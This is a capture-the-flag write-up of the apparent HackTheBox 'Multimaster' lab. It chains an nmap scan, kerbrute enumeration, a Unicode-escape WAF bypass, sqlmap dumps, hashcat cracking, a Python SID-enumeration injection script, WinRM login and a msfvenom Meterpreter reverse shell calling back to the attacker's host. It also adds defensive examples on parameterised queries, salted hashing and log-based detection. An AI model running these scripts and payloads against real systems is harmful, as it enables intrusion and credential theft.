nmap -p- --min-rate 1000 -v -sV -sC -A -Pn 10.10.10.179
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 6944F7C42798BE78E1465F1C49B5BF04
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: MegaCorp
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-17 11:59:31Z)
135/tcp open tcpwrapped
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGACORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: MEGACORP
| NetBIOS_Domain_Name: MEGACORP
| NetBIOS_Computer_Name: MULTIMASTER
| DNS_Domain_Name: MEGACORP.LOCAL
| DNS_Computer_Name: MULTIMASTER.MEGACORP.LOCAL
| DNS_Tree_Name: MEGACORP.LOCAL
| Product_Version: 10.0.14393
|_ System_Time: 2023-07-17T12:00:33+00:00
| ssl-cert: Subject: commonName=MULTIMASTER.MEGACORP.LOCAL
| Issuer: commonName=MULTIMASTER.MEGACORP.LOCAL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-16T11:27:23
| Not valid after: 2024-01-15T11:27:23
| MD5: 5f19 2837 0bbd 1e6d 0817 a338 6a34 a157
|_SHA-1: 21ce 2357 7cb1 5efe 38f6 e8ae 1fbb 4604 6d03 abf9
|_ssl-date: 2023-07-17T12:01:12+00:00; +7m00s from scanner time.
5985/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open unknown
49668/tcp open unknown
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open unknown
49678/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49744/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MULTIMASTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h31m01s, deviation: 3h07m53s, median: 6m59s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: MULTIMASTER
| NetBIOS computer name: MULTIMASTER\x00
| Domain name: MEGACORP.LOCAL
| Forest name: MEGACORP.LOCAL
| FQDN: MULTIMASTER.MEGACORP.LOCAL
|_ System time: 2023-07-17T05:00:38-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-07-17T12:00:32
|_ start_date: 2023-07-17T11:27:28
MULTIMASTER.MEGACORP.LOCAL
There is a colleague finder feature; submitting an empty search returns every employee's record.
Extracted all the e-mail addresses:
sbauer@megacorp.htb
okent@megacorp.htb
ckane@megacorp.htb
kpage@megacorp.htb
shayna@megacorp.htb
james@megacorp.htb
cyork@megacorp.htb
rmartin@megacorp.htb
zac@magacorp.htb
jorden@megacorp.htb
alyx@megacorp.htb
ilee@megacorp.htb
nbourne@megacorp.htb
zpowers@megacorp.htb
aldom@megacorp.htb
minato@megacorp.htb
egre55@megacorp.htb
Pulled out the usernames and verified them with kerbrute; all of them are domain users.
./kerbrute_linux_amd64 userenum --dc MULTIMASTER.MEGACORP.LOCAL -d MEGACORP.LOCAL ~/Downloads/temp/multimaster/username.txt
Tried AS-REP roasting, with no result.
Back to the web app: the only query endpoint appears to sit behind a WAF; setting name to `select` returns a 403, the same response directory scanning got.
First step is to find out which characters are blocked, using wfuzz or Burp Intruder directly.
Found a fuzzing wordlist online; nearly everything came back 403.
wfuzz -c -u http://10.10.10.179/api/getColleagues -w ~/Downloads/temp/multimaster/fuzz.txt -d '{"name":"FUZZ"}' -H 'Content-Type: application/json;charset=utf-8' -t 1
Checked a writeup; the wordlist used there was /usr/share/seclists/Fuzzing/special-chars.txt
Because the request's Content-Type carries charset=utf-8, the author tried Unicode-encoding the single quote as \u27 and successfully triggered an error. Encoded it by hand with CyberChef and sent it from Repeater:
admin' order by 5 -- asdf
admin' order by 6 -- asdf
Confirmed the column count is 5.
admin' union select 1,2,3,4,5 -- asdf
Every column is echoed back; pick any one of them.
admin' union select 1,2,@@version,4,5 -- asdf
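The bypass above works because the filter inspects the request body as it arrives on the wire, before the application's JSON decoder turns `\u0027` back into a quote. The following added example (not code from the writeup or from the MegaCorp application; sqlite3 stands in for MSSQL so it runs offline, and the table rows and column layout are constructed) applies the same filter before and after decoding, and shows the parameterised query that makes a character filter unnecessary in the first place.

```python
import json
import re
import sqlite3

# Added example, not the MegaCorp application's code. sqlite3 stands in for
# MSSQL so it runs offline; the rows and column layout below are constructed.

# What a body-inspecting filter rejects: a quote, or the keywords the writeup
# found to trigger a 403.
SQL_META = re.compile(r"'|\b(select|union)\b", re.IGNORECASE)


def raw_body_filter(raw_body: str) -> bool:
    """Inspect the body as it arrives on the wire. True means 'block' (403)."""
    return SQL_META.search(raw_body) is not None


def decode_name(raw_body: str) -> str:
    """What the application actually sees: JSON turns \\u0027 back into '."""
    return json.loads(raw_body)["name"]


def decoded_filter(raw_body: str) -> bool:
    """The same filter applied after decoding, i.e. to the value that reaches SQL."""
    return SQL_META.search(decode_name(raw_body)) is not None


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Colleagues(id INTEGER, name TEXT, position TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO Colleagues VALUES (?, ?, ?, ?)",
        [  # constructed rows
            (1, "User One", "Developer", "user1@example.invalid"),
            (2, "User Two", "Consultant", "user2@example.invalid"),
            (3, "User Three", "Manager", "user3@example.invalid"),
        ],
    )
    return conn


def find_colleagues_unsafe(conn, name: str):
    """String-built query: the shape the writeup's UNION payloads exploit."""
    sql = f"SELECT id, name, position, email FROM Colleagues WHERE name LIKE '%{name}%'"
    return conn.execute(sql).fetchall()


def find_colleagues_safe(conn, name: str):
    """Parameterised query: the decoded quote is data, never SQL syntax."""
    sql = "SELECT id, name, position, email FROM Colleagues WHERE name LIKE ?"
    return conn.execute(sql, (f"%{name}%",)).fetchall()


if __name__ == "__main__":
    escaped = '{"name":"admin\\u0027 order by 5 -- asdf"}'  # the body shape the writeup sent
    print("raw filter blocks escaped body:", raw_body_filter(escaped))  # False
    print("decoded filter blocks it:      ", decoded_filter(escaped))   # True
    conn = make_db()
    print("unsafe rows for injected name:", len(find_colleagues_unsafe(conn, "' OR 1=1 --")))  # 3
    print("safe rows for injected name:  ", len(find_colleagues_safe(conn, "' OR 1=1 --")))    # 0
```

The point for a defender is the order of operations: any filter must run on the canonical, fully decoded value, and even then it is a stopgap; with a bound parameter the decoded quote is just part of the search string.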
On to sqlmap; this service is very easy to knock over, hence the delay.
sqlmap -r 1.txt --tamper=charunicodeescape --delay 5 --level 5 --risk 3 --technique="U" --union-cols=5 --prefix="admin' " --suffix="-- asdf" --batch --proxy http://127.0.0.1:8080 --dbms=mssql --dbs
The current database has only two tables, so dump it directly.
sqlmap -r 1.txt --tamper=charunicodeescape --delay 5 --level 5 --risk 3 --technique="U" --union-cols=5 --prefix="admin' " --suffix="-- asdf" --batch --proxy http://127.0.0.1:8080 --dbms=mssql -D Hub_DB --dump
The Logins table holds the hashes; the Colleagues table holds names, e-mails and positions.
Identified the hash type with the online hash_identifier site.
SHA3-384 produced nothing; Keccak-384 cracked with hashcat (john does not support this type).
hashcat -a 0 -m 17900 hash.txt /usr/share/wordlists/rockyou.txt
| Password | Users |
|---|---|
| password1 | sbauer, shayna, james, cyork, jorden, aldom |
| finance1 | ckane, kpage, zac, ilee, zpowers |
| banking1 | okent, rmartin, alyx, nbourne |
| ? | minatotw, egre55 |
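The grouping in that table is only possible because the Logins hashes carry no per-user salt: every account with the same password has byte-identical digests, so the shared passwords are visible before a single one is cracked. The added example below (not from the writeup; Keccak-384 is not in Python's hashlib, so SHA3-384 stands in, and the Logins rows are constructed from the page's usernames) performs that audit over a hash store and contrasts it with a salted, memory-hard scheme.

```python
import hashlib
import hmac
import os
from collections import defaultdict
from typing import Optional

# Added example, not from the writeup. Keccak-384 (hashcat -m 17900) is not in
# hashlib, so SHA3-384 stands in; the property demonstrated, the absence of a
# per-user salt, is the same for both.


def unsalted_digest(password: str) -> str:
    return hashlib.sha3_384(password.encode()).hexdigest()


def group_by_digest(records):
    """records: iterable of (username, hex_digest).
    Returns {digest: [users]} for every digest shared by more than one user.
    On an unsalted store the shared digests reveal shared passwords before a
    single one is cracked; the table above is this grouping after cracking."""
    groups = defaultdict(list)
    for user, digest in records:
        groups[digest.lower()].append(user)
    return {d: sorted(u) for d, u in groups.items() if len(u) > 1}


def scrypt_hash(password: str, salt: Optional[bytes] = None):
    """Salted, memory-hard alternative: two users with the same password get
    different digests, and each guess costs real work."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2 ** 14, r=8, p=1)
    return salt, digest


def scrypt_verify(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.scrypt(password.encode(), salt=salt, n=2 ** 14, r=8, p=1)
    return hmac.compare_digest(candidate, digest)


# Constructed Logins rows using the page's usernames and recovered passwords.
CONSTRUCTED_LOGINS = [
    ("sbauer", unsalted_digest("password1")),
    ("jorden", unsalted_digest("password1")),
    ("ckane", unsalted_digest("finance1")),
    ("zac", unsalted_digest("finance1")),
    ("okent", unsalted_digest("banking1")),
    ("minatotw", unsalted_digest("constructed-unique-passphrase")),
]

if __name__ == "__main__":
    for digest, users in group_by_digest(CONSTRUCTED_LOGINS).items():
        print(digest[:16], "shared by", users)
    salt, digest = scrypt_hash("password1")
    print("scrypt verify:", scrypt_verify("password1", salt, digest))  # True
```

Running `group_by_digest` over an exported credential table is a cheap audit: any shared digest means the store is unsalted and the reused passwords are exposed to exactly the wordlist attack the writeup used.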
Tried these passwords against the web app, SMB and WinRM; none of them log in.
The MSSQL injection page on HackTricks notes that domain users can be enumerated through MSSQL.
```python
import sys
import requests
import string
import binascii
import struct
import time

proxy = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
head = {
    "Origin": "http://10.10.10.179",
    "Referer": "http://10.10.10.179/",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
    "Content-Type": "application/json;charset=utf-8"
}


def charunicodeescape(payload):
    # Same transformation as sqlmap's charunicodeescape tamper: every character
    # becomes a JSON \uXXXX escape, so no raw quote or keyword reaches the WAF.
    retVal = payload
    if payload:
        retVal = ""
        i = 0
        while i < len(payload):
            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
                retVal += r"\u00%s" % payload[i + 1:i + 3]
                i += 3
            else:
                retVal += r'\u%.4X' % ord(payload[i])
                i += 1
    return retVal


def query(key):
    # Places `key` in the 4th UNION column, which is echoed back as "email".
    url = "http://10.10.10.179/api/getColleagues"
    payload = "admin' union select 1,2,3,{},5 -- asdf".format(key)
    payload = charunicodeescape(payload)
    # The body is assembled by hand: json.dumps would escape the backslashes again.
    content = '{"name": "' + payload + '"}'
    r = requests.post(url, data=content, proxies=proxy, timeout=10, headers=head)
    if r.status_code == 200:
        row = r.json()[0]
        return row.get("email")
    print("error!")
    return None


domain_name = query("DEFAULT_DOMAIN()")
print("查询域名如下:{}".format(domain_name))
# Domain SID = SID of <domain>\Administrator without the trailing RID (last 4 bytes = 8 hex chars)
sid_hex = query("master.dbo.fn_varbintohexstr(SUSER_SID('{}\\Administrator'))".format(domain_name))
domain_sid_hex = sid_hex[:-8]
print("查询域sid:{}".format(domain_sid_hex))
# Enumerate domain RIDs: append each RID (little-endian) to the domain SID and resolve it
for i in range(500, 10500):
    sys.stdout.write(f"\r[*] Checking SID {i}" + " " * 50)
    user_sid_hex = binascii.hexlify(struct.pack("<I", i)).decode()
    full_sid_hex = domain_sid_hex + user_sid_hex
    try:
        result = query("SUSER_SNAME({})".format(full_sid_hex))
    except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout):
        print("{}超时".format(i))
        time.sleep(5)
        result = query("SUSER_SNAME({})".format(full_sid_hex))
    if result:
        print("找到域用户:{} {}".format(str(i), result))
    time.sleep(5)
```
One small pitfall here: if the request is sent as

```python
content = {"name": payload}
r = requests.post(url, json=content)
```

the backslash in a Unicode escape such as `\u0027` is escaped a second time and arrives as `\\u0027`.
A new user shows up: tushikikatomo.
crackmapexec winrm -u tushikikatomo -p password1 finance1 banking1 -d MEGACORP.LOCAL 10.10.10.179
evil-winrm -i 10.10.10.179 -u tushikikatomo -p finance1
net user /domain
This lists all the domain users:
Administrator aldom alice alyx andrew ckane cyork dai DefaultAccount Guest ilee james jorden jsmmons kpage krbtgt lana nbourne okent pmartin rmartin sbauer svc-nas svc-sql tushikikatomo zac zpowers
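Both the kerbrute user enumeration earlier (a burst of AS-REQs, many for names that do not exist) and the password attempts above (the same few passwords tried across accounts over SMB and WinRM) leave the same kind of trace on the domain controller: one source touching many distinct accounts within a short window. The following added detection example (not from the writeup) runs that check over constructed records shaped like Security log events 4768, 4771 and 4625; the field names, thresholds and sample values are assumptions, not real logs.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Added example, not from the writeup. Event records are constructed in the
# shape of fields a SIEM would extract from Security events 4768 (TGT request),
# 4771 (pre-authentication failed) and 4625 (logon failure); not real logs.

KRB_UNKNOWN_PRINCIPAL = "0x6"   # 4768 result code: KDC_ERR_C_PRINCIPAL_UNKNOWN
KRB_PREAUTH_FAILED = "0x18"     # 4771 result code: KDC_ERR_PREAUTH_FAILED


def classify(ev):
    """Map one event to the behaviour it evidences, or None if uninteresting."""
    if ev["event_id"] == 4768 and ev["status"] == KRB_UNKNOWN_PRINCIPAL:
        return "user-enumeration"   # probing names that do not exist (kerbrute userenum)
    if ev["event_id"] == 4771 and ev["status"] == KRB_PREAUTH_FAILED:
        return "password-failure"   # Kerberos pre-auth failed: wrong password
    if ev["event_id"] == 4625:
        return "password-failure"   # NTLM/local logon failure (SMB, WinRM, RDP ...)
    return None


def detect(events, window=timedelta(minutes=5), threshold=5):
    """Return {(source_ip, kind): sorted accounts} for every source that touches
    at least `threshold` distinct accounts of one kind within `window`."""
    per_source = defaultdict(list)
    for ev in events:
        kind = classify(ev)
        if kind:
            per_source[(ev["source_ip"], kind)].append((ev["time"], ev["account"].lower()))
    hits = {}
    for key, items in per_source.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            seen = {acct for t, acct in items[i:] if t - start <= window}
            if len(seen) >= threshold:
                hits[key] = sorted(seen)
                break
    return hits


def constructed_events():
    """Constructed sample: one enumerating/spraying source and one benign user."""
    t0 = datetime(2023, 7, 17, 12, 0, 0)
    events = []
    # Enumeration-like burst: one source, many unknown names, 4768 with 0x6
    for i, name in enumerate(["guest1", "test", "backup", "support", "helpdesk", "sqladmin"]):
        events.append(dict(time=t0 + timedelta(seconds=i), event_id=4768,
                           status=KRB_UNKNOWN_PRINCIPAL, account=name, source_ip="10.10.14.4"))
    # Spray-like: one password tried against many real accounts over WinRM/SMB
    for i, name in enumerate(["sbauer", "okent", "ckane", "kpage", "shayna"]):
        events.append(dict(time=t0 + timedelta(minutes=1, seconds=5 * i), event_id=4625,
                           status="0xC000006A", account=name, source_ip="10.10.14.4"))
    # Benign: one user mistyping their own password twice
    for i in range(2):
        events.append(dict(time=t0 + timedelta(minutes=2, seconds=i), event_id=4771,
                           status=KRB_PREAUTH_FAILED, account="alyx", source_ip="10.10.10.50"))
    return events


if __name__ == "__main__":
    for (src, kind), accounts in detect(constructed_events()).items():
        print(f"{src}: {kind} across {len(accounts)} accounts: {', '.join(accounts)}")
```

Keying on distinct accounts per source rather than on failure counts per account is what separates a spray from a single user fumbling a password: the benign source here generates failures but never crosses the distinct-account threshold. In production the 4768/0x6 signal requires "Audit Kerberos Authentication Service" to be enabled on the DCs.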
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.4 LPORT=4444 EXITFUNC=thread -f raw -o raw.bin
Then used Knownsec's ShellcodeLoader in dynamic-load mode to build a loader.
It threw an error but still called back; wanted to migrate to another process, so ran ps.
Noticed many code.exe processes.
The Program Files directory confirms VS Code is indeed installed.